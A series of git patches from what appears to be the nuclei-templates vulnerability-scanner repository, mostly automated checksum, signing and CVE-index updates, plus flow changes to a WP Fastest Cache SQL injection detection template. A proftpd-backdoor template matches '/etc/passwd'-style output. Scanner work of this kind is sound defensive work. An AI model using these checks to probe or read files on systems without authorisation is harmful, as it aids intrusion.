'passive/cves/2024/CVE-2024-25723.yaml' workflow_dispatch: From b17695ae4b1cdd3e6aa288359c4eac0148f9a115 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 5 Jun 2024 07:54:57 +0000 Subject: [PATCH 1754/1768] Auto Template Signing [Wed Jun 5 07:54:57 UTC 2024] :robot: --- javascript/backdoor/proftpd-backdoor.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/javascript/backdoor/proftpd-backdoor.yaml b/javascript/backdoor/proftpd-backdoor.yaml index dec673b6fc..2275724aee 100644 --- a/javascript/backdoor/proftpd-backdoor.yaml +++ b/javascript/backdoor/proftpd-backdoor.yaml @@ -44,4 +44,5 @@ javascript: - type: regex regex: - - "root:.*:0:0:" \ No newline at end of file + - "root:.*:0:0:" +# digest: 4a0a00473045022100dd6e52def8924c5a01a17c75bb09fcc784f5f0353f2788939136ee3ecd00b9220220262dff383d49d22ef5a299f5352cd746313ee6814fee6dd76e6a0c8da707c5f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 492ee41107aee215e73c452c63904285aca83f77 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 5 Jun 2024 13:25:59 +0530 Subject: [PATCH 1755/1768] update flow --- http/cves/2023/CVE-2023-6063.yaml | 21 +++++++++++++++++---- 1 file changed, 17 insertions(+), 4 deletions(-) diff --git a/http/cves/2023/CVE-2023-6063.yaml b/http/cves/2023/CVE-2023-6063.yaml index a8830ef8e9..475d23fb11 100644 --- a/http/cves/2023/CVE-2023-6063.yaml +++ b/http/cves/2023/CVE-2023-6063.yaml @@ -1,4 +1,4 @@ -id: CVE-2023-6063 +id: CVE-2023-6063 info: name: WP Fastest Cache 1.2.2 - SQL Injection @@ -32,11 +32,24 @@ info: tags: cve,cve2023,wp-fastest-cache,wpscan,wordpress,wp-plugin flow: | - for (var i = 0; i < 3; i++) { - http(1) - } + if (http(1)) { + for (let i = 0; i < 2; i++) { + http(2); + }} http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wp-fastest-cache/readme.txt" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "WP Fastest Cache")' + condition: and + internal: true + - raw: - | @timeout: 20s From cddc4138ef0369cf01c831aba67c2730fb5525df Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 5 Jun 2024 07:56:08 +0000 Subject: [PATCH 1756/1768] Auto Generated Templates Checksum [Wed Jun 5 07:56:08 UTC 2024] :robot: --- templates-checksum.txt | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8ae99984f2..79de678485 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3317,6 +3317,7 @@ http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-3822.yaml:3b09a61773b3f696a26e7a152cfa5d1968aa9dc8 http/cves/2024/CVE-2024-4040.yaml:9470254ef11bec4f99022dac385a6198071a2cad http/cves/2024/CVE-2024-4348.yaml:82d6d18aedb35323e1c359a8467f30ab49a8aae9 +http/cves/2024/CVE-2024-4358.yaml:fbc541e9790dac108af524828c9e196d7c640e9a http/cves/2024/CVE-2024-4956.yaml:a00f92400517494320ec968d237c98bb1056de25 http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671 @@ -7770,6 +7771,7 @@ http/vulnerabilities/other/dss-download-fileread.yaml:99d5bcf47324083def79e63def http/vulnerabilities/other/duomicms-sql-injection.yaml:ee36f8e9e2bfda358c4851065c331d9988f55537 http/vulnerabilities/other/dzzoffice-xss.yaml:8e89cae5618ff076d9bdadce356bb4ae547844d4 http/vulnerabilities/other/eaa-app-lfi.yaml:97b0823d04ad3588ce93c66dd73c78dff743f1be +http/vulnerabilities/other/easycvr-info-leak.yaml:2857e400b48c9919fa9c889bb46b59318e0bc45e http/vulnerabilities/other/easyimage-downphp-lfi.yaml:c13b2da7bd29bd39b5c0e7b09d94a864c38367ac http/vulnerabilities/other/ecology-oa-file-sqli.yaml:6ac7efef6739bb5063e9b1787fe1c6120048a56a http/vulnerabilities/other/ecshop-sqli.yaml:151963cca04a4163b76e6ff7021db99290abc406 @@ -8388,7 +8390,7 @@ http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml:daa2040c8238fbe51311e7ac http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:80348e0fda22d428224a9a62afae01b8380694a0 http/vulnerabilities/zzzcms/zzzcms-xss.yaml:61a6fd65556054e8e2a631080388aff7aed42f6b javascript/audit/mysql/mysql-load-file.yaml:d61333fa25344c2c59bbc1b18b5907a83ea48441 -javascript/backdoor/proftpd-backdoor.yaml:a50e27ef624d89532253c293b2d646d1cbbefe39 +javascript/backdoor/proftpd-backdoor.yaml:3773a0d97c81615104eb63d8d5fc8fe02348d0b6 javascript/cves/2012/CVE-2012-2122.yaml:94abd222ef37d5fcab0bd7d4bd3801b63236762c javascript/cves/2016/CVE-2016-8706.yaml:2b62e791d6879ee11d4c9894198c31e6af8c2e05 javascript/cves/2019/CVE-2019-9193.yaml:11b9baf1c50e125986f9667f3538b5ebdf8f445b @@ -8626,7 +8628,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:6a2d5af209d4d4dc55fcb6df1b0e142dccc53012 +templates-checksum.txt:962b4f3fd05cbcfe528d0fd64adcfec423f635b8 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 29c2ec1a0a185bd708602ea22b43e590ca3f58d1 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 5 Jun 2024 13:27:25 +0530 Subject: [PATCH 1757/1768] lint fix --- http/cves/2023/CVE-2023-6063.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-6063.yaml b/http/cves/2023/CVE-2023-6063.yaml index 475d23fb11..7be5b08cdb 100644 --- a/http/cves/2023/CVE-2023-6063.yaml +++ b/http/cves/2023/CVE-2023-6063.yaml @@ -1,4 +1,4 @@ -id: CVE-2023-6063 +id: CVE-2023-6063 info: name: WP Fastest Cache 1.2.2 - SQL Injection From d7a9194e61ff3778ac4e54df4f331661662f55e4 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 5 Jun 2024 07:57:58 +0000 Subject: [PATCH 1758/1768] Auto Template Signing [Wed Jun 5 07:57:58 UTC 2024] :robot: --- http/cves/2024/CVE-2024-4358.yaml | 1 + http/vulnerabilities/other/easycvr-info-leak.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2024/CVE-2024-4358.yaml b/http/cves/2024/CVE-2024-4358.yaml index b2e32509c0..031ce07c3b 100644 --- a/http/cves/2024/CVE-2024-4358.yaml +++ b/http/cves/2024/CVE-2024-4358.yaml @@ -62,3 +62,4 @@ http: dsl: - '"Username: "+ user' - '"Password: "+ pass' +# digest: 4a0a00473045022073c556e756e6d6fb4b9792f22067ff76c6003d9505047f3905f340af05df6d48022100e433930cd957e1bf060ea49fa34577268b5f703eea322d42d45ed8153879fb57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/easycvr-info-leak.yaml b/http/vulnerabilities/other/easycvr-info-leak.yaml index 94a5bab8a8..5ff933c1fa 100644 --- a/http/vulnerabilities/other/easycvr-info-leak.yaml +++ b/http/vulnerabilities/other/easycvr-info-leak.yaml @@ -44,3 +44,4 @@ http: - type: status status: - 200 +# digest: 4a0a004730450220559cf25013e8fadf841cbf3f2e1991451fe171f9c1e923a7b4aa4950c63fccd1022100e009237cf034f4190512efdf6f99a949c82da6a0101d5a73fb2f1b7df6ab9c70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From d7a5e1c0989944693b78f26e6ddcce9f176ef8fc Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 5 Jun 2024 08:06:58 +0000 Subject: [PATCH 1759/1768] Auto Generated New Template Addition List [Wed Jun 5 08:06:58 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index b04d215c02..9d6d20d44f 100644 --- a/.new-additions +++ b/.new-additions @@ -6,12 +6,14 @@ http/cves/2022/CVE-2022-34534.yaml http/cves/2023/CVE-2023-2059.yaml http/cves/2023/CVE-2023-3077.yaml http/cves/2023/CVE-2023-48084.yaml +http/cves/2024/CVE-2024-1380.yaml http/cves/2024/CVE-2024-21683.yaml http/cves/2024/CVE-2024-24919.yaml http/cves/2024/CVE-2024-27348.yaml http/cves/2024/CVE-2024-34470.yaml http/cves/2024/CVE-2024-3495.yaml http/cves/2024/CVE-2024-3822.yaml +http/cves/2024/CVE-2024-4358.yaml http/cves/2024/CVE-2024-5230.yaml http/default-logins/ampjuke-default-login.yaml http/default-logins/cambium-networks/cambium-networks-default-login.yaml From c2497c00eb3df385a11eed74d88768267a2611ae Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 5 Jun 2024 08:07:19 +0000 Subject: [PATCH 1761/1768] Auto Generated Templates Checksum [Wed Jun 5 08:07:19 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 79de678485..6ad905acfb 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3226,7 +3226,7 @@ http/cves/2023/CVE-2023-6020.yaml:53d613fc898b341e0e4636b42bb596feabf64888 http/cves/2023/CVE-2023-6021.yaml:9f6d4772e7a300d8e9c4c5899e9e46bfc4a58082 http/cves/2023/CVE-2023-6023.yaml:3a730637eccac887e1162588d4f19076f1767008 http/cves/2023/CVE-2023-6038.yaml:45afe9e78f6b59a1cf80b02d2cd461f51a7274a7 -http/cves/2023/CVE-2023-6063.yaml:32096f6833a737d95a0ecdc8efd59c606fddd027 +http/cves/2023/CVE-2023-6063.yaml:76eb706150de84bbd373a6523c74be5b019a9dd6 http/cves/2023/CVE-2023-6065.yaml:b8808f0d626ba5e51da0c22de6f1b564455133e7 http/cves/2023/CVE-2023-6114.yaml:5dc0c50f0958887f67d7ed03075e3983350045fe http/cves/2023/CVE-2023-6360.yaml:ded41747153de73db0aa449ecfd1b3d32965f434 @@ -3261,6 +3261,7 @@ http/cves/2024/CVE-2024-1208.yaml:a64398099908496a14705ee1ea9a82ef498f471e http/cves/2024/CVE-2024-1209.yaml:83acee361fad278c37690439c442a8deef01cd3c http/cves/2024/CVE-2024-1210.yaml:7af2bde109e8f0dbb0af5f22cdbcfd5e2c0cc132 http/cves/2024/CVE-2024-1212.yaml:ff3afc7fa9564d0aadd7087edb0eb9e0fd329ffe +http/cves/2024/CVE-2024-1380.yaml:44cadd112c6f179322c827ee6a1fd8882418a0a4 http/cves/2024/CVE-2024-1561.yaml:659c9112fbbf202496c98637b8ffcfd2665024ab http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 http/cves/2024/CVE-2024-1709.yaml:3978d9abbcba91bb6b6fe4cf6130cc35695bd1b8 @@ -3317,7 +3318,7 @@ http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-3822.yaml:3b09a61773b3f696a26e7a152cfa5d1968aa9dc8 http/cves/2024/CVE-2024-4040.yaml:9470254ef11bec4f99022dac385a6198071a2cad http/cves/2024/CVE-2024-4348.yaml:82d6d18aedb35323e1c359a8467f30ab49a8aae9 -http/cves/2024/CVE-2024-4358.yaml:fbc541e9790dac108af524828c9e196d7c640e9a +http/cves/2024/CVE-2024-4358.yaml:e64b958f2da8291fef4dee711db632c9f4e6cea0 http/cves/2024/CVE-2024-4956.yaml:a00f92400517494320ec968d237c98bb1056de25 http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671 @@ -7771,7 +7772,7 @@ http/vulnerabilities/other/dss-download-fileread.yaml:99d5bcf47324083def79e63def http/vulnerabilities/other/duomicms-sql-injection.yaml:ee36f8e9e2bfda358c4851065c331d9988f55537 http/vulnerabilities/other/dzzoffice-xss.yaml:8e89cae5618ff076d9bdadce356bb4ae547844d4 http/vulnerabilities/other/eaa-app-lfi.yaml:97b0823d04ad3588ce93c66dd73c78dff743f1be -http/vulnerabilities/other/easycvr-info-leak.yaml:2857e400b48c9919fa9c889bb46b59318e0bc45e +http/vulnerabilities/other/easycvr-info-leak.yaml:4a339e7ca4c5dbec8db0c3f71ab8d9c47f503e6b http/vulnerabilities/other/easyimage-downphp-lfi.yaml:c13b2da7bd29bd39b5c0e7b09d94a864c38367ac http/vulnerabilities/other/ecology-oa-file-sqli.yaml:6ac7efef6739bb5063e9b1787fe1c6120048a56a http/vulnerabilities/other/ecshop-sqli.yaml:151963cca04a4163b76e6ff7021db99290abc406 @@ -8628,7 +8629,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:962b4f3fd05cbcfe528d0fd64adcfec423f635b8 +templates-checksum.txt:aff5e83e62003a482a3e2fd3953540715cbe5809 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d5dae49a64bdd7e662197d4633bed77cd43398c2 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 5 Jun 2024 08:07:23 +0000 Subject: [PATCH 1762/1768] Auto Generated cves.json [Wed Jun 5 08:07:23 UTC 2024] :robot: --- cves.json | 5 +++-- cves.json-checksum.txt | 2 +- 2 files changed, 4 insertions(+), 3 deletions(-) diff --git a/cves.json b/cves.json index 0d999c385b..5c9f03048a 100644 --- a/cves.json +++ b/cves.json @@ -2329,7 +2329,7 @@ {"ID":"CVE-2023-6021","Info":{"Name":"Ray API - Local File Inclusion","Severity":"high","Description":"LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6021.yaml"} {"ID":"CVE-2023-6023","Info":{"Name":"VertaAI ModelDB - Path Traversal","Severity":"high","Description":"The endpoint \"/api/v1/artifact/getArtifact?artifact_path=\" is vulnerable to path traversal. The main cause of this vulnerability is due to the lack of validation and sanitization of the artifact_path parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6023.yaml"} {"ID":"CVE-2023-6038","Info":{"Name":"H2O ImportFiles - Local File Inclusion","Severity":"high","Description":"An attacker is able to read any file on the server hosting the H2O dashboard without any authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6038.yaml"} -{"ID":"CVE-2023-6063","Info":{"Name":"WP Fastest Cache 1.2.2 - Unauthenticated SQL Injection","Severity":"high","Description":"The WP Fastest Cache WordPress plugin before 1.2.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6063.yaml"} +{"ID":"CVE-2023-6063","Info":{"Name":"WP Fastest Cache 1.2.2 - SQL Injection","Severity":"high","Description":"The WP Fastest Cache WordPress plugin before 1.2.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6063.yaml"} {"ID":"CVE-2023-6065","Info":{"Name":"Quttera Web Malware Scanner \u003c= 3.4.1.48 - Sensitive Data Exposure","Severity":"medium","Description":"The Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 doesn't restrict access to detailed scan logs, which allows a malicious actor to discover local paths and portions of the site's code\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-6065.yaml"} {"ID":"CVE-2023-6114","Info":{"Name":"Duplicator \u003c 1.5.7.1; Duplicator Pro \u003c 4.5.14.2 - Unauthenticated Sensitive Data Exposure","Severity":"high","Description":"The Duplicator WordPress plugin before 1.5.7.1, Duplicator Pro WordPress plugin before 4.5.14.2 does not disallow listing the `backups-dup-lite/tmp` directory (or the `backups-dup-pro/tmp` directory in the Pro version), which temporarily stores files containing sensitive data. When directory listing is enabled in the web server, this allows unauthenticated attackers to discover and access these sensitive files, which include a full database dump and a zip archive of the site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6114.yaml"} {"ID":"CVE-2023-6360","Info":{"Name":"WordPress My Calendar \u003c3.4.22 - SQL Injection","Severity":"critical","Description":"WordPress My Calendar plugin versions before 3.4.22 are vulnerable to an unauthenticated SQL injection within the 'from' and 'to' parameters of the '/my-calendar/v1/events' REST route.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6360.yaml"} @@ -2382,7 +2382,7 @@ {"ID":"CVE-2024-2389","Info":{"Name":"Progress Kemp Flowmon - Command Injection","Severity":"critical","Description":"In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command injection vulnerability has been identified. An unauthenticated user can gain entry to the system via the Flowmon management interface, allowing for the execution of arbitrary system commands.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-2389.yaml"} {"ID":"CVE-2024-23917","Info":{"Name":"JetBrains TeamCity \u003e 2023.11.3 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.3 authentication bypass leading to RCE was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-23917.yaml"} {"ID":"CVE-2024-24131","Info":{"Name":"SuperWebMailer 9.31.0.01799 - Cross-Site Scripting","Severity":"medium","Description":"SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulenrability via the component api.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-24131.yaml"} -{"ID":"CVE-2024-24919","Info":{"Name":"Check Point Quantum Gateway - Information Disclosure","Severity":"high","Description":"CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN or mobile access software blade.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-24919.yaml"} +{"ID":"CVE-2024-24919","Info":{"Name":"Check Point Quantum Gateway - Information Disclosure","Severity":"high","Description":"CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or mobile access software blade.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-24919.yaml"} {"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution – Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"} {"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"} {"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"} @@ -2420,6 +2420,7 @@ {"ID":"CVE-2024-3822","Info":{"Name":"Base64 Encoder/Decoder \u003c= 0.9.2 - Cross-Site Scripting","Severity":"medium","Description":"The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-3822.yaml"} {"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"} {"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"} +{"ID":"CVE-2024-4358","Info":{"Name":"Progress Telerik Report Server - Authentication Bypass","Severity":"critical","Description":"In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4358.yaml"} {"ID":"CVE-2024-4956","Info":{"Name":"Sonatype Nexus Repository Manager 3 - Local File Inclusion","Severity":"high","Description":"Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-4956.yaml"} {"ID":"CVE-2024-5230","Info":{"Name":"FleetCart 4.1.1 - Information Disclosure","Severity":"medium","Description":"Issues with information disclosure in redirect responses. Accessing the majority of the website's pages exposes sensitive data, including the \"Razorpay\" \"razorpayKeyId\".\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-5230.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index b9cdde8cf7..16dc2bfc76 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -d337d7264c683ea11584b411b8bcb172 +7bfe54c4491f1002937ca044e92d59d7 From 4df137b5f2993bc5320dca36e04921a9ccd8a603 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 5 Jun 2024 08:08:04 +0000 Subject: [PATCH 1763/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index ec16888164..0a94ae4d07 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -11,12 +11,14 @@ on: - 'http/cves/2023/CVE-2023-2059.yaml' - 'http/cves/2023/CVE-2023-3077.yaml' - 'http/cves/2023/CVE-2023-48084.yaml' + - 'http/cves/2024/CVE-2024-1380.yaml' - 'http/cves/2024/CVE-2024-21683.yaml' - 'http/cves/2024/CVE-2024-24919.yaml' - 'http/cves/2024/CVE-2024-27348.yaml' - 'http/cves/2024/CVE-2024-34470.yaml' - 'http/cves/2024/CVE-2024-3495.yaml' - 'http/cves/2024/CVE-2024-3822.yaml' + - 'http/cves/2024/CVE-2024-4358.yaml' - 'http/cves/2024/CVE-2024-5230.yaml' - 'http/default-logins/ampjuke-default-login.yaml' - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' From 73e329ffbd58f0defc0098ca95fb9d6f0e52dbb8 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 5 Jun 2024 08:08:43 +0000 Subject: [PATCH 1764/1768] Auto Template Signing [Wed Jun 5 08:08:43 UTC 2024] :robot: --- http/cves/2023/CVE-2023-6063.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-6063.yaml b/http/cves/2023/CVE-2023-6063.yaml index 7be5b08cdb..a8d8042f29 100644 --- a/http/cves/2023/CVE-2023-6063.yaml +++ b/http/cves/2023/CVE-2023-6063.yaml @@ -64,3 +64,4 @@ http: - 'status_code == 200' - 'contains(body, "/wp-")' condition: and +# digest: 4a0a00473045022004cfaae0dc548a746f2ac8518775b253ea274661021c3b7f22759e9d709b8ee6022100843555767a7cac5718662e92a81db100fec5216a00af6868223053d1470dfedf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From fb8d4d32f31fa1e07dbc23620d7ae94524477bf8 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 5 Jun 2024 08:11:57 +0000 Subject: [PATCH 1766/1768] Auto Generated Templates Checksum [Wed Jun 5 08:11:57 UTC 2024] :robot: --- templates-checksum.txt | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6ad905acfb..87f400ca13 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -187,8 +187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:ee679e39399a1034603fc71366f0ce86effc9394 -cves.json-checksum.txt:0650e06b1d0806329262c0f0bb6b558ddd1ac707 +cves.json:dc9bafb46fe914a031c1ee639a2fea1995c67454 +cves.json-checksum.txt:e35d1b788a97940d595aee8ff549b6104ea3f682 dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22 dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3226,7 +3226,7 @@ http/cves/2023/CVE-2023-6020.yaml:53d613fc898b341e0e4636b42bb596feabf64888 http/cves/2023/CVE-2023-6021.yaml:9f6d4772e7a300d8e9c4c5899e9e46bfc4a58082 http/cves/2023/CVE-2023-6023.yaml:3a730637eccac887e1162588d4f19076f1767008 http/cves/2023/CVE-2023-6038.yaml:45afe9e78f6b59a1cf80b02d2cd461f51a7274a7 -http/cves/2023/CVE-2023-6063.yaml:76eb706150de84bbd373a6523c74be5b019a9dd6 +http/cves/2023/CVE-2023-6063.yaml:b776af7a38c9a9240931b1c106226cbe2efd7ed9 http/cves/2023/CVE-2023-6065.yaml:b8808f0d626ba5e51da0c22de6f1b564455133e7 http/cves/2023/CVE-2023-6114.yaml:5dc0c50f0958887f67d7ed03075e3983350045fe http/cves/2023/CVE-2023-6360.yaml:ded41747153de73db0aa449ecfd1b3d32965f434 @@ -7029,7 +7029,7 @@ http/technologies/swag-instance-default-page.yaml:d4643f41f726f357460d39fa02b869 http/technologies/switch-protocol.yaml:9e7d35889c050f18a43fdfd29498913b84878b6a http/technologies/synology-web-station.yaml:28d3a14c78cde632ddbed93de03148cffb1b3fb6 http/technologies/tableau-server-detect.yaml:6e0417d43e7d6773330d82b6088270c9004a8daa -http/technologies/tech-detect.yaml:9a412a58865301201466e8d67a25407470b4a3b3 +http/technologies/tech-detect.yaml:88a4087e262947836d1f890569453b5f27c17cc8 http/technologies/telerik/telerik-dialoghandler-detect.yaml:28ede6444f34199767b36a8317d80eb705805366 http/technologies/telerik/telerik-fileupload-detect.yaml:eb5db507fb5a1c3bfba3651c389c4e8b175ca2d1 http/technologies/teradici-pcoip.yaml:710bd965305a025c6f8793f5e3e13fa2117212ad @@ -8629,7 +8629,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 